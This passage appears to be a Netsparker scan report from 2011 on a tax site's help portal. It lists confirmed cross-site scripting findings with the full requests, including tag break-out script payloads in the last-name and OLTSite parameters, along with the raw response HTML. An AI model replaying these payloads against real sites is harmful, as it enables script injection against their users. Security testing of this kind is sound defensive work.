<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=O1k6iKsk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=O1k6iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=O1k6iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=O1k6iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=O1k6iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br /><table cellpadding="2" cellspacing="0" bo..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET TyYLtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
create_acct_btn POST Create a New Account
p_accessibility POST 0
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST netsparker@example.com
p_first_name POST Smith
p_last_name POST '"--></style></script><script>alert(0x001F93)</script>
p_li POST 3
p_lva POST 3
p_next_page POST myovr.php
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_redirect POST 3
p_sid POST TyYLtJsk
p_sp POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Content-Length: 557
Accept-Encoding: gzip, deflate

create_acct_btn=Create+a+New+Account&p_accessibility=0&p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=netsparker%40example.com&p_email_alt2=netsparker%40example.com&p_first_name=Smith&p_last_name=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001F93)%3C%2Fscript%3E&p_li=3&p_lva=3&p_next_page=myovr.php&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_redirect=3&p_sid=TyYLtJsk&p_sp=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:00:26 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sat, 30-Apr-2011 00:20:26 GMT
RNT-Time: D=313864 t=1304121626580359
RNT-Machine: 11
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=O_C7iKsk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=O_C7iKsk&amp;p_accessibility=0&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=O_C7iKsk&amp;p_accessibility=0&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=O_C7iKsk&amp;p_accessibility=0&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=O_C7iKsk&amp;p_accessibility=0&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=1&p_redirect=3"><img height="1" width="1" border="0" src="/rnt/rnw/img/enduser/tl.gif" alt="show accessible links"/></a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field...
- /cgi-bin/olt.cfg/php/enduser/help_general.php

/cgi-bin/olt.cfg/php/enduser/help_general.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x0020AA)</script>
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x
p_depth GET 1

Request

GET /cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0020AA)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_depth=1 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:02:33 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=220474 t=1304121753200545
RNT-Machine: 05
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4172
X-Cnection: close
Content-Type: text/html; charset=UTF-8


